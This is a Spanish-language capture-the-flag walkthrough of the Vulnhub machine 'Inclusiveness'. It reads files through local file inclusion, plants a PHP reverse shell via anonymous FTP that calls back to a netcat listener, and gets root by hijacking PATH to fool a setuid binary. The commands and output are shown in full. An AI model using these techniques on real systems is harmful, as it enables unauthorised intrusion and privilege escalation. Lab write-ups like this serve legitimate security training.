[VLN] Inclusiveness

Hoy vamos a hackear la maquina de Vulnhub llamada Inclusiveness. Podeis descargarla desde el siguiente enlace: Inclusiveness

Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ nmap -A -p- 192.168.1.96
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-30 11:27 CEST
Nmap scan report for inclusiveness.home (192.168.1.96)
Host is up (0.00036s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0            4096 Feb 08 21:51 pub [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.148
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 06:1b:a3:92:83:a5:7a:15:bd:40:6e:0c:8d:98:27:7b (RSA)
|   256 cb:38:83:26:1a:9f:d3:5d:d3:fe:9b:a1:d3:bc:ab:2c (ECDSA)
|_  256 65:54:fc:2d:12:ac:e1:84:78:3e:00:23:fb:e4:c9:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.96 seconds
Podemos ver que podemos loguear con anonymous en el FTP y que solo hay una carpeta llamada "pub".

sml@Cassandra:~$ ftp 192.168.1.96
Connected to 192.168.1.96.
220 (vsFTPd 3.0.3)
Name (192.168.1.96:sml): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Feb 08 21:51 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> 
Apache solo muestra la web "por defecto". Al intentar mirar el /robots.txt nos aparece el siguiente mensaje: You are not a search engine! You can't read my robots.txt! Usamos curl para falsear el user-agent y que piense que somos un buscador:

sml@Cassandra:~$ curl --user-agent "Googlebot/2.1 
(+http://www.google.com/bot.html)" -v $@ http://192.168.1.96/robots.txt
*   Trying 192.168.1.96:80...
* TCP_NODELAY set
* Connected to 192.168.1.96 (192.168.1.96) port 80 (#0)
> GET /robots.txt HTTP/1.1
> Host: 192.168.1.96
> User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 30 Mar 2020 09:27:26 GMT
< Server: Apache/2.4.38 (Debian)
< Last-Modified: Sat, 08 Feb 2020 03:26:11 GMT
< ETag: "2d-59e08115bb1ef"
< Accept-Ranges: bytes
< Content-Length: 45
< Content-Type: text/plain
< 
User-agent: *
Disallow: /secret_information/
* Connection #0 to host 192.168.1.96 left intact
Nos devuelve: Disallow: /secret_information/ En http://192.168.1.96/secret_information/ aparece una web con un texto y 2 links, al hacer clic en cualquiera de ellos al final de la url se agrega: ?lang=en o ?lang=es, asi que probamos si ?lang= es vulnerable a LFI. Podemos usar fi-cyberspace-scan[1].

sml@Cassandra:~/tools/fi-cyberspace-scan$ python fi-cyberscan.py -t 
http://192.168.1.96/secret_information/?lang= -m 3
-----------------------------------------------------------------
'___ *  .    '   \|/     *   .   '      + .----. .  '  -*-    
|===|     ' __   -*-  FI Cyberspace-Scan  ||'''|_       ' ___ 
|= =|__'  _|==|_ /|\  ___     * .   __   _||= =|.| *   __|===|
|= =|::| |.|:|==|____|= =| .   ____|==| |::|= =|.|__ '|::|= =|
|=|=|::|_|.|:|==| :: |_.-`-.__|----|==|_|::|=|=|.|::|_|::|= =|
-----------------------Hardwired Options-------------------------
TARGET URL                   : http://192.168.1.96/secret_information/?lang=    
                                                                                
      
CYBER ATTACK MODE            : Kuang-Grade-Mark-11
PATH TYPE                    : ../
DEEP SPACE TRAVERSAL         : False
NULL-BYTE %00                : False
-----------------------------------------------------------------
DO NOT USE AGAINST UNAUTHORIZED INTRUSION COUNTERMEASURE ELECTRONICS            
                                                                                
      
Execute Cyberspace Run? [Y/n]: 

-----------------------------------------------------------------
It seems  146  is the common reflected byte size.                               
                                                                                  
Digging into unique reflection sizes.                                                                                                                              
-----------------------------------------------------------------               
                                                                              
[+] - Something interesting found with proc/self/cmdline in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with proc/self/stat in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with etc/issue in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with etc/motd in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with etc/passwd in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with etc/group in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with etc/mysql/my.cnf in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with etc/vsftpd.conf in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with etc/fstab in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with proc/self/cmdline in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with proc/self/stat in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with proc/self/status in 
     --Path:  /
     --Path:  ../../../../
-----------------------------------------------------------------
Cyber Run Status:      COMPLETE                                                                                                                                 
-----------------------------------------------------------------
Es vulnerable a LFI y podemos ver el contenido de varios ficheros. Si miramos el contenido del fichero /etc/vsftpd.conf: http://192.168.1.96/secret_information/?lang=etc/vsftpd.conf Podemos ver que tiene la linea: anon_root=/var/ftp/ Eso quiere decir que cuando subimos algo al FTP como usuario anonymous (el cual tiene la carpeta pub), realmente lo estamos poniendo en /var/ftp/pub, sabiendo esto podemos subir el tipico php-reverse-shell y usar LFI para ejecutarlo.

Exploitation



sml@Cassandra:/usr/share/webshells/php$ cp php-reverse-shell.php 
/home/sml/webshell.php
sml@Cassandra:~$ nano webshell.php #Modificamos la ip y puerto. 
sml@Cassandra:~$ ftp 192.168.1.96
Connected to 192.168.1.96.
220 (vsFTPd 3.0.3)
Name (192.168.1.96:sml): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd pub
250 Directory successfully changed.
ftp> put webshell.php
local: webshell.php remote: webshell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5495 bytes sent in 0.00 secs (201.5554 MB/s)
ftp>
Ahora que hemos subido php-reverse-shell.php ejecutamos en un terminal:

nc -nlvp 5555
Y visitamos http://192.168.1.96/secret_information/?lang=/var/ftp/pub/webshell.php Ya tenemos una shell :)

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.96] 43170
Linux inclusiveness 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) 
x86_64 GNU/Linux
 20:16:40 up 52 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

Privilege Escalation


En /home/tom podemos ver un ejecutable llamado rootshell con setuid y propietario/grupo root, el cual si pudieramos ejecutar obtendriamos los privilegios de root. Podemos ver el codigo que se encuentra en rootshell.c

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

int main() {

    printf("checking if you are tom...\n");
    FILE* f = popen("whoami", "r");

    char user[80];
    fgets(user, 80, f);

    printf("you are: %s\n", user);
    //printf("your euid is: %i\n", geteuid());

    if (strncmp(user, "tom", 3) == 0) {
        printf("access granted.\n");
        setuid(geteuid());
        execlp("sh", "sh", (char *) 0);
    }
}
Basicamente lo que hace es "ejecuta" whoami, y comprueba si la salida es "tom", si es "tom", obtendremos privilegios de root. Para ello, vemos que no ha puesto el path absoluto a whoami, lo cual nos permite poder modificar la variable $PATH y crear un script llamado whoami que al ejecutarlo de como salida "tom", asi al ejecutar el programa nos dara una shell de root.

$ cd /tmp
$ echo "echo tom" > whoami
$ chmod +x whoami
$ echo $PATH                                                                                                                                                                                                                                                      
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 
$ export PATH=/tmp:$PATH                                                                                                                                                                                                                                                                                          
$ echo $PATH                                                                                                                                                         
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin                                                                                              
$ cd /home/tom
$ ./rootshell
checking if you are tom...
you are: tom

access granted.
# id
uid=0(root) gid=33(www-data) groups=33(www-data)
# cd /root
# ls
flag.txt
# cat flag.txt

|\---------------\
||                |
|| UQ Cyber Squad |       
||                |
|\~~~~~~~~~~~~~~~\
|
|
|
|
o

flag{omg_you_did_it_YAY}
#

End


Y con esto ya seriamos root de la maquina :) [1]https://github.com/rtcrowley/fi-cyberspace-scan